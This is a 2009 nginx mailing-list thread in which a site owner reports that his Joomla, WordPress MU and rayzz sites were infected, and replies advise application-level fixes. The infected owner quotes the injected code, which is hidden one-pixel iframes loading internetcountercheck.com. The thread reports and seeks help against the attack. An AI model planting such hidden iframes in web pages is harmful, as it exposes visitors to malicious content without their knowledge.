Glen,<br><br>There isn&#39;t currently a module in NginX which addresses this, and there is some good reasons why even if there were you should still need to fix this at the application level.  You probably (but not necessarily) have misconfigured, old, or compromised versions of these as they are allowing HTML entities from user input.<br>
<br>Minimally, you should check your settings for each system and turn off HTML in comments or whatever fields they are using to input.  You should probably do a fresh install of the latest version of each one (if possible) and make sure HTML is off after that.<br>
<br>Good luck!<br>- Merlin<br><br><div class="gmail_quote">On Thu, Mar 19, 2009 at 10:13 AM, Glen Lumanau <span dir="ltr">&lt;<a href="mailto:glen@lumanau.web.id">glen@lumanau.web.id</a>&gt;</span> wrote:<br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
I&#39;m running 3 different CMS<br>
<br>
1. Joomla<br>
2. Wordpress MU<br>
3. rayzz<br>
<br>
All of them are infected at the same time<br>
<div><div></div><div class="h5"><br>
-----Original Message-----<br>
From: <a href="mailto:owner-nginx@sysoev.ru">owner-nginx@sysoev.ru</a> [mailto:<a href="mailto:owner-nginx@sysoev.ru">owner-nginx@sysoev.ru</a>] On Behalf Of<br>
Cliff Wells<br>
Sent: 19 Maret 2009 23:28<br>
To: <a href="mailto:nginx@sysoev.ru">nginx@sysoev.ru</a><br>
Subject: Re: [OOT] <a href="http://internetcountercheck.com" target="_blank">internetcountercheck.com</a> iFrame<br>
<br>
On Thu, 2009-03-19 at 18:03 +0700, Glen Lumanau wrote:<br>
&gt; All my sites is being injected by a code<br>
&gt;<br>
&gt; &lt;iframe src=&quot;<a href="http://internetcountercheck.com/?click=7158656" target="_blank">http://internetcountercheck.com/?click=7158656</a>&quot; width=1<br>
&gt; height=1 style=&quot;visibility:hidden;position:absolute&quot;&gt;&lt;/iframe&gt;&lt;iframe<br>
&gt; src=&quot;<a href="http://internetcountercheck.com/?click=7282625" target="_blank">http://internetcountercheck.com/?click=7282625</a>&quot; width=1 height=1<br>
&gt; style=&quot;visibility:hidden;position:absolute&quot;&gt;&lt;/iframe&gt;<br>
&gt;<br>
&gt;<br>
&gt;<br>
&gt; Somebody has an issue like this? How can we solve it?<br>
&gt;<br>
<br>
What software are you running?  This should be reported to (and fixed<br>
by) them.<br>
<br>
Cliff<br>
<br>
<br>
<br>
</div></div></blockquote></div><br>